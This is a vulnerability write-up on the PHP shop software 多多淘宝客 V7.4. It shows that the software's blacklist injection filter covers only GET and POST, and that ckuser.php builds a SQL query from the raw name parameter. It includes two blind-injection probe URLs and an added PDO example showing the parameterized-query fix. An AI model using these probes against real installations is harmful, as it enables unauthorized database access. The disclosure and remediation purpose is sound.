多多淘宝客 V7.4: Bypassing the Anti-Injection Filter and Analysis of an Injection Vulnerability
Because the program is open source, I downloaded it and read through the code. The programmer does have some security awareness.

Anti-injection code:

```php
// Illegal characters to filter
$ArrFiltrate = array (
    "#union#i",
    "#<script#i",
    "#/script>#i",
    "#select#i",
    "#alert#i",
    "#javascript#i",
    "#<table#i",
    "#<td#i",
    "#\"#i",       // double quote
    "#\'#i",       // escaped single quote
    "#delete#i",
    "#vbscript#i",
    "#applet#i",
    "#frame#i",
    "#<div#i",
    "#update#i",
    "#'#i",        // single quote
    "#union #i",
    "#select #i",
    "#delete #i",
    "#update #i",
    "#and #i",
    "#;#i",
    "#update#i"
);
$replacements = '';

// Recursively strip every matching pattern from each value in $array
function FunStringExist(&$array, $ArrFiltrate, $replacements)
{
    if (is_array($array)) {
        foreach ($array as $key => $value) {
            if (is_array($value))
                FunStringExist($array[$key], $ArrFiltrate, $replacements);
            else
                $array[$key] = preg_replace($ArrFiltrate, $replacements, $value);
        }
    }
}

FunStringExist($_GET, $ArrFiltrate, $replacements);
FunStringExist($_POST, $ArrFiltrate, $replacements);
```

This code is still flawed: it only filters `$_GET` and `$_POST`, so we only need to find a place that reads input through request.

Another file does not call the anti-injection code at all, which leads to a string-type injection, although it is affected by gpc:

```php
header("Content-Type:text/html;charset=utf-8");
include "../comm/config.php";
$uname = trim($_GET["name"]);
if ($uname == '') {
    echo "true";
} else {
    $con = @mysql_connect("$dbserver", "$dbuser", "$dbpass") or die(ERR_DB);
    mysql_select_db("$dbname", $con) or die("can not choose the dbname!");
    // $uname reaches the query without passing through the filter above
    $query = "select * from ".$BIAOTOU."user where ddusername='".$uname."'";
    mysql_query("set names utf8");
    $res = mysql_query($query);
    if (mysql_num_rows($res) != 0) { echo "true"; }
    else { echo "false"; }
}
```

First register a user so that the program's check can pass.

```
ckuser.php?name=maxadd' and 1=1 and ''='    returns true
ckuser.php?name=maxadd' and 1=2 and ''='    returns false
```
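The fix for the lookup in ckuser.php is to bind the user name as a query parameter instead of relying on the blacklist filter or gpc. The block below is an added example, not code from 多多淘宝客 or from the original article: it runs the article's two test values against the concatenated query and against a bound one. It assumes PHP with PDO and an in-memory SQLite database standing in for the application's MySQL database; the table name `dd_user` and the function names are hypothetical, and `ddusername` is the column from ckuser.php.

```php
<?php
// Constructed stand-in for the application's database: in-memory SQLite.
// "dd_user" is an assumed table name; "ddusername" is the column used in ckuser.php.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE dd_user (ddusername TEXT)");
$pdo->exec("INSERT INTO dd_user (ddusername) VALUES ('maxadd')");

// Same shape as ckuser.php: the value is concatenated into the SQL text,
// so quote characters in it change the structure of the WHERE clause.
function userExistsConcat(PDO $pdo, string $uname): bool
{
    $sql = "select * from dd_user where ddusername='" . $uname . "'";
    return $pdo->query($sql)->fetch() !== false;
}

// Hardened form: the value is bound as a parameter and is only ever
// compared as data, whatever characters it contains.
function userExistsBound(PDO $pdo, string $uname): bool
{
    $stmt = $pdo->prepare("select 1 from dd_user where ddusername = ?");
    $stmt->execute([$uname]);
    return $stmt->fetch() !== false;
}

// A plain lookup plus the two test values from the article.
$inputs = [
    "maxadd",
    "maxadd' and 1=1 and ''='",
    "maxadd' and 1=2 and ''='",
];

foreach ($inputs as $in) {
    printf(
        "%-28s concat=%-5s bound=%s\n",
        $in,
        var_export(userExistsConcat($pdo, $in), true),
        var_export(userExistsBound($pdo, $in), true)
    );
}
```

With the bound query, both test values are looked up as literal user names, so the true/false difference that the concatenated query exposes disappears.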